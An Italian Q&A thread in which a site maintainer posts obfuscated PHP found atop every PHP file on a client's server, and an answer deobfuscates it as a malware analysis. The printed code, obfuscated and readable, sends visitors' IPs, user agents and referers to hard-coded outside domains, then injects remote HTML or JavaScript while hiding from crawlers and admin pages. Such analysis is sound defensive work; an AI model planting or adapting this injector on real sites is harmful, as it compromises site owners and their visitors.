Questa è una backdoor?


Ho trovato il codice qui sotto sul sito di un mio cliente. Sembra una tipica backdoor offuscata con sequenze esadecimali, ma non ne sono sicuro al 100%.

<?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x55c%x7825tww**WYsboepn)%x5c%x78258:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]2715hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5464]284]364]6]234]342]58]24]31#-%x5782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7860hfsq)!sp!*#ojneb#-278]225]241]334]368]322]3]364]6]2{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%160%x28%42%x66%152%x66%147%x67%42%x2c%163%y35]256]y76]72]y3d]51]y35]274]y4:]82ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7c%x7825iN}#-!tussfw)%x!isset($GLOBALS["%x61%156%x75%156%x61"])))) 
%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvsox7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x7825:|:*r%x5c%x7825:-t%x5c%x782%x782f#%x5c%x7825#%x5c%xx7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;7824-%x5c%x7824]y8%x5cx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%jyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRx5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus85csboe))1%x5c%x782f3g%x5c%x7825)!gj!~<ofmyx5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%xx7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%787f_*#fubfsdXk5%x5c%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c3:]68]y76#<%x5c%x78e%x5c%x78b,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%%x5c%x7860TW~%x5c%x7824<%xx7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7317]445]212]445]43]321]87f<*X&Z&S{ftmfV%x5c%x78%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudc%x7825:<**#57]38y]47]67y]37]88y]27]28yx7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x59]274]y85]273]y6g]273]y76]%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#uj4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]Dx7825zB%x5c%x7825z>!HB%x5c%x7860SFTV%x5c%x7860QUUIy76]61]y33]68]y34]68]ypd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7gA%x5c%x7827doj%x5c%x78256<%xc%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fufs:~:<*9-1-r%x5c%x7825)s%x5c!>!#]y84]275]
y83]273]y76]277fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}c%x7825!<*#}_;#)323ldfid>}&;!osvufs}825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%xgj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjc%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-278256<.msv%x5c%x7860dz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]285]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); };)gj}l;33bq}k;opjudovg}%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{56<pd%x5c%x7825w6Z6<.4*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25mm)%x5c%x7825%x5c%ubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<%x7824-%x5c%x7824]26%x5c%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825x5c%x7825Z<^2%x5c%x785c7%x65","%x65%166%x61%154%]#%x5c%x782fr%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786027,*b%x5c%x7827)fepd787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5cftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]%x5c%x7825,3,j%x5c%x7825>j%x7824]25%x5c%x7824-%x5#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#mhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825{ $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return 
chr(ox5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x:h%x5c%x7825:<#64y]5>}R;msv}.;%x5c%x782f#%x5c%x7W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)t&b%x5c%x7825!|!*)323zbek!~!#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x7825>%x5c%x782fh%x581]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%xx28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x75c%x78e%x5c%x78b%x5c%x78!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rc%x7825!<*::::::-111112)eobs%x5c%x7860un%x7824-%x5c%x7824<%x5c78]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f5]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78255.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y8)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFb:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!%x782f20QUUI7jsv%x5c%x78257UFH#%x5%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hAx5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=trd($n)-1);} @error_reporting(0); 
preg_replace("%x2f%50%x2e%52%x29%585cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]DwN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x782]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%5c%x7878;0]=])0#)U!%x5c%x7827z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5D#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgPdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78c%x782f+*0f(-!#]y76]277]y72]265j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%825i%x5c%x785c2^<!Ce*[!%x5cpqsut>j%x5c%x7825!*9!%x5c%x7827!hmqj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj83]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw5%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw5]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%xbss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnx5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd}x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y35c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x782x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7822b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x75c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x7824
2178}527}85c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7826<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfs2fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78255c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825wc%x7824-!%x5c%x7825%25hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>%x782f7&6|7**111127-K)qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv>qp%x5c%x7825!|Z~!<##!>!2p%x%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wbd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x56*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7882f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y8%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825t%x5c%x7827pd%x5c%x782%x5c%x787f;!opjudovg}k~~9{d%-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+f52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462<b%x5c%x7825%x5c%x787f!<X>b!|ftmf!~<**9.-j%x5c%x7825/(.*)/epreg_replacepcxbdxfawf'; $ibnuwgraod = 
explode(chr((272-228)),'3721,60,1040,44,4913,69,6639,67,4175,25,5385,67,880,43,3781,56,7594,63,2006,29,6509,67,9756,21,3876,22,3532,51,1285,39,7868,58,1712,52,728,25,4442,69,9108,22,2767,44,228,65,6997,43,6357,34,3325,57,7457,39,8745,65,7272,52,4115,37,6100,56,3099,58,9571,37,3965,46,5581,53,6706,36,6742,41,3382,20,4551,40,1898,21,3499,33,3278,47,2964,29,8908,59,5905,39,2357,64,2864,35,1560,42,2525,52,7557,37,9442,64,4231,63,3157,41,144,24,8232,66,2035,34,1381,47,2421,40,3459,40,2811,53,10081,25,9805,67,3234,44,8344,64,5127,59,7423,34,1690,22,4651,27,2461,64,686,42,1241,44,7926,62,8163,69,2701,66,1205,36,4152,23,8472,39,6391,63,8572,47,9385,57,2993,49,6156,47,4294,20,293,52,5774,40,9321,28,8682,63,9935,55,4819,47,753,27,3898,47,1150,55,5322,63,68,22,6203,43,2649,30,5186,27,10054,27,4077,38,9872,63,540,58,1764,70,8115,48,5040,28,9506,65,3198,36,9777,28,168,60,1500,60,6454,55,2180,69,959,59,7763,53,4314,60,2156,24,4011,42,4700,58,5717,57,5213,38,7155,53,4374,68,3837,39,3696,25,6922,29,813,67,1357,24,633,53,8298,46,2331,26,9651,66,7657,56,3071,28,6048,52,496,44,9279,42,3042,29,5251,21,2249,39,4200,31,8810,63,0,68,5020,20,9990,64,5452,59,1324,33,8619,63,377,70,6876,46,4678,22,8967,20,8408,64,7354,42,1602,67,9130,66,4982,38,1428,22,4053,24,5814,22,2899,65,9196,34,90,54,4511,40,6292,65,8066,49,923,36,7095,60,1018,22,8511,61,7396,27,1084,66,5658,59,2629,20,4866,47,6832,44,447,49,8987,69,345,32,7816,52,5272,50,3583,53,5836,38,5511,70,7208,64,6783,49,2577,52,7988,39,5874,31,1969,37,9717,39,3402,57,4591,60,780,33,7496,61,2133,23,598,35,8027,39,1669,21,5991,57,1450,50,6576,63,9056,52,8873,35,6246,46,1834,64,2288,43,9230,49,5944,47,6951,46,9349,36,2069,26,5634,24,3945,20,2095,38,4758,61,5068,59,1919,50,7040,55,7324,30,7713,50,2679,22,9608,43,3636,60'); $hlrywdpqbc=substr($zdsnpbzghe,(44960-34854),(41-34)); if (!function_exists('kscpwxzuhr')) { function kscpwxzuhr($xjucvuiret, $bsoixxpekh) { $uzadkdkdcj = NULL; 
for($ylffdjxxwv=0;$ylffdjxxwv<(sizeof($xjucvuiret)/2);$ylffdjxxwv++) { $uzadkdkdcj .= substr($bsoixxpekh, $xjucvuiret[($ylffdjxxwv*2)],$xjucvuiret[($ylffdjxxwv*2)+1]); } return $uzadkdkdcj; };} $jztylhmlin="\x20\x2a\x740\x6f7\x632\x774\x782\x20\x2f\x656\x614\x283\x742\x5f2\x650\x6c1\x635\x283\x682\x28\x32\x36\x31\x39\x29\x203\x682\x28\x32\x35\x32\x33\x29\x203\x733\x707\x782\x750\x72\x241\x626\x757\x672\x617\x64\x242\x643\x6e0\x622\x670\x65\x29\x3b\x2f\x206\x6f3\x7a2\x6d5\x765\x6e\x2a\x20"; $nbbppijzpp=substr($zdsnpbzghe,(68445-58332),(68-56)); $nbbppijzpp($hlrywdpqbc, $jztylhmlin, NULL); $nbbppijzpp=$jztylhmlin; $nbbppijzpp=(752-631); $zdsnpbzghe=$nbbppijzpp-1; ?>

Se è davvero una backdoor, sono curioso di sapere cosa faccia, se qualcuno ha la pazienza di interpretarla.

Grazie in anticipo.

Modifica

Il mio cliente non si occupa di sviluppo web e, quando gli ho chiesto di questo codice, ha detto di non averlo sicuramente mai visto prima.

Ho notato che il codice si trova ora in cima a quasi tutti i file di un'installazione di WordPress, come se fosse stato inserito lì automaticamente.

EDIT 2:

Il codice dannoso è stato infatti inserito in ogni file PHP sul server, non solo all'interno di WordPress.

    
posta Ivar 13.10.2014 - 16:58

1 risposta


No. La backdoor non è in questo script. Questo pezzo di codice, pesantemente offuscato, contiene un programma che permette all'attaccante di aggiungere dinamicamente HTML o JavaScript arbitrari, contattando un server situato all'indirizzo 31.184.192.250 tramite uno, scelto a caso, dei quattro nomi host "33db9538.com", "9507c4e8.com", "e5b57288.com", "54dfa1cb.com".

Il codice deoffuscato è simile al seguente:

// generate hostname
// Returns one of the hard-coded labels with $qw appended (day212() passes ".com").
// NOTE(review): the $arr argument is discarded — the array is reassigned on the next
// line — and rand(0, 1.125) is presumably a deobfuscation artifact (rand() takes
// ints, so as written only index 0 or 1 can be selected).
function random($arr, $qw) {
    $arr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    return $arr[rand(0, 1.125)].$qw;
}

// return hostname of malware-hosting server
// $domarr is not defined in this scope (it is a local of day212() below), but
// random() ignores its first argument, so the call still yields "<label>.com".
function cqq($qw)
{
    return random($domarr, $qw);
}

// custom encoding
// XOR "cipher": builds a keystream $g at least as long as $s from chained md5
// digests seeded with $q and the constant "q1w2e3r4", then XORs it with $s.
// XOR is its own inverse, so the same function both encodes the request fields
// (via k34()) and decodes the server's reply in day212(). The key $q is the
// six-digit "op" that travels in the URL, so captured traffic can be decoded
// offline for analysis.
function en2($s, $q)
{
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g.$q."q1w2e3r4")); # convert to binary string
        $g.= substr($q, 0, 8); # keep 8 of the 16 digest bytes; $q now seeds the next round
    }
    return $s^$g; # XOR, bits set in either $s or $g but not both
}

// g_* functions are four different ways to retrieve content from remote URL
// (only g_1 and g_2 appear in this excerpt; g_3 and g_4 are elided at "...." below).
// Each returns the response body, or false when the transport is unavailable or the
// fetch yields nothing. The "@" suppresses PHP warnings, so failed fetches leave no
// trace in the error log — outbound HTTP from web workers is better watched at the
// network/egress layer.
function g_1($url)
{
    if(function_exists("file_get_contents") === false) return false;
    $buf = @file_get_contents($url);
    if($buf == "") return false; # loose compare: a failed read (false) also takes this path
    return $buf;
}

// cURL variant of the fetch: 10 s timeout, body only (no headers), returned as a string.
function g_2($url)
{
    if(function_exists("curl_init") === false) return false;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $res = curl_exec($ch);
    curl_close($ch);
    if($res == "") return false; # as in g_1: a false result from curl_exec is treated as empty
    return $res;
}
....

// try progressively more complicated method if the previous one did not work
// Returns the first non-false result from g_1..g_4, or "" when every transport
// failed (day212() then finds no "!NF0" delimiter and injects nothing). Warnings
// are again suppressed with "@". g_3 and g_4 are not shown in this excerpt.
function gtd($url)
{
    $co = "";
    $co = @g_1($url);
    if($co !== false) return $co;
    $co = @g_2($url);
    if($co !== false) return $co;
    $co = @g_3($url);
    if($co !== false) return $co;
    $co = @g_4($url);
    if($co !== false) return $co;
    return "";
}

// encode server parameters
// en2() with the per-request $op as key, then base64. This is how the visitor's
// user agent, referer, client IP, host and script path are packed into the query
// string that day212() sends to the remote server (it urlencodes the joined result).
function k34($op, $text)
{
    return base64_encode(en2($text, $op));
}

// check if server parameters exist
// Returns $_SERVER[$param], or the sentinel string "non" when the key is missing
// or empty; day212() compares against "non" to decide whether to contact the server.
function check212($param)
{
    if(!isset($_SERVER[$param])) $a = "non";
    else if($_SERVER[$param] == "") $a = "non";
    else $a = $_SERVER[$param];
    return $a;
}

// extract payload
// Decides whether this request should receive injected content and, if so,
// fetches it from the remote server. Returns the HTML/JS to inject, or "" when
// the request is skipped or the fetch/decoding yields nothing.
function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");
    $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); // unused here; random() carries its own copy
    // Selective-delivery gate: requests without UA/IP/host, any script path
    // containing "admin" (site administrators), and well-known crawler user agents
    // (search engines) always get the clean page. This is why the injection is
    // invisible from the WordPress dashboard and from search-engine fetches; to see
    // it, test with an ordinary browser UA on a non-admin URL.
    if(($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin")
     or (preg_match("/google|slurp|msnbot|ia_archiver|yandex|rambler/i", strtolower($a))))
    {
        $o1 = "";
    }
    else {
        // Per-request six-digit key: it is both the XOR key for en2() and the first
        // path segment of the URL, so the server can decode the fields and encode its reply.
        $op = mt_rand(100000, 999999);
        $g4 = $op."?".urlencode(urlencode(k34($op, $a).".".k34($op, $b).".".k34($op, $c)
         .".".k34($op, $d).".".k34($op, $e)));
        // Request shape: http://<label>.com/<6 digits>?<double-urlencoded, dot-joined fields>
        // — a usable pattern for proxy/egress log searches when scoping an incident.
        $url = "http://".cqq(".com")."/".$g4;
        $ca1 = en2(@gtd($url) , $op);   // reply is XOR-encoded with the same $op
        $a1 = @explode("!NF0", $ca1);   // "!NF0" delimits the reply; the payload is the 2nd part
        if(sizeof($a1) >= 2) $o1 = $a1[1];
        else $o1 = "";
    }
    return $o1;
}

// uncompress html to buffer
// Tries several decompressors on the output buffer (raw deflate, comgzi(), zlib,
// and gzip where gzdecode() exists) and returns the first that succeeds, else the
// buffer unchanged. comgzi() is not a PHP builtin and is not defined in this
// listing — presumably a helper dropped from the excerpt. $length is never used.
function dcoo($cz, $length = null)
{
    if(false !== ($dz = @gzinflate($cz))) return $dz;
    if(false !== ($dz = @comgzi($cz))) return $dz;
    if(false !== ($dz = @gzuncompress($cz))) return $dz;
    if(function_exists("gzdecode")) {
        $dz = @gzdecode($cz);
        if(false !== $dz) return $dz;
    }
    return $cz;
}

// callback function to accept buffer and append code at bottom of html
// Output-buffer callback registered by ob_start() below. Since the buffer may
// have been decompressed by dcoo(), it forces "Content-Encoding: none" so the
// browser does not try to inflate it. The payload from day212() is inserted once,
// just before the first </body> (or </html> when there is no </body>); output
// without either tag passes through untouched. Note that day212() — and with it
// the outbound request — is only evaluated on pages where one of those tags matches.
function pa22($v)
{
    Header("Content-Encoding: none");
    $t = dcoo($v);
    if(preg_match("/\<\/body/si", $t)) {
        return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n$1", $t, 1);
    }
    else {
        if(preg_match("/\<\/html/si", $t)) {
            return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n$1", $t, 1);
        }
        else {
            return $t;
        }
    }
}

// start processing
// Registers pa22() as the output-buffer callback, so every page that this prefix
// has been prepended to is post-processed before it is sent to the client — which
// matches the observation that the code was inserted at the top of every PHP file.
ob_start("pa22");

/**** original code starts here ****/
....

Il codice sopra elude il rilevamento da parte dei principali motori di ricerca e dell'amministratore del sito, perché restituisce la pagina normale quando sono soddisfatti determinati criteri (ad esempio user agent di un crawler noto o URL contenente "admin"). Non sono riuscito a scoprire quale codice venga aggiunto, poiché anche il server che ospita il malware esegue alcuni controlli per verificare che la richiesta provenga da un server infetto.

Sembra che la vulnerabilità di WordPress sia stata introdotta da una versione non aggiornata del plugin MailPoet. Essa consente a un attaccante, con le credenziali di un amministratore, di caricare uno script malevolo in un tema WordPress ed eseguirlo navigando al suo URL. Ulteriori informazioni sono disponibili in questo blog di sicurezza.

La lezione principale di questo incidente è fare backup frequenti dei dati e aggiornare il software con diligenza.

    
risposta data 20.10.2014 - 06:13
